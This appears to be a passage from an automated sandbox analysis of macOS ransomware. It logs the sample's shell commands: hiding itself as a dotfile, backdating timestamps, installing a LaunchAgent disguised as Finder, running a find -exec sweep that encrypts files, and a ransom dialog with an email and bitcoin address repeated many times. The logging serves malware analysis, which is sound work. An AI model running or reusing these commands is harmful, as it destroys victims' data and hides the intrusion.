Source: /usr/bin/osascript (PID: 853)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 853)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 856)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 856)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 859)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 859)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 862)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 862)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 865)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 865)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Explicitly modifies time stamps using the "touch" command
Source: /bin/sh (PID: 698)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 699)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 730)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 731)Touch executable uses -c (no creation) and -t (set access/modification time) options: touch -ct 201606071012 /var/root/Library/.FS_Store
Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)
Source: /bin/sh (PID: 688)Shell process: sysctl hw.model
Source: /bin/sh (PID: 689)Shell process: grep Mac
Source: /bin/sh (PID: 694)Shell process: sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 696)Shell process: sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 693)Shell process: grep 2
Source: /bin/sh (PID: 697)Shell process: mv /Users/vreni/Desktop/macRansom /var/root/Library/.FS_Store
Source: /bin/sh (PID: 698)Shell process: touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 699)Shell process: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 700)Shell process: launchctl remove com.apple.finder
Source: /bin/sh (PID: 701)Shell process: launchctl load /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 706)Shell process: sysctl hw.model
Source: /bin/sh (PID: 707)Shell process: grep Mac
Source: /bin/sh (PID: 712)Shell process: sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 714)Shell process: sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 711)Shell process: grep 2
Source: /bin/sh (PID: 715)Shell process: find /Volumes /var/root ! -path /var/root/Library/.FS_Store -type f -size +8c -user root -perm -u=r -exec /var/root/Library/.FS_Store {} +
Source: /bin/sh (PID: 717)Shell process: whoami
Source: /bin/sh (PID: 720)Shell process: sysctl hw.model
Source: /bin/sh (PID: 721)Shell process: grep Mac
Source: /bin/sh (PID: 726)Shell process: sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 728)Shell process: sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 725)Shell process: grep 2
Source: /bin/sh (PID: 730)Shell process: touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 731)Shell process: touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 732)Shell process: killall Finder
Source: /bin/sh (PID: 736)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 740)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 743)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 747)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 750)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 753)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 756)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 759)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 762)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 765)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 768)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 771)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 774)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 777)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 780)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 784)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 787)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 790)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 793)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 796)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 799)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 802)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 805)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 808)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 811)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 814)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 817)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 820)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 823)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 826)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 829)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 832)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 835)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
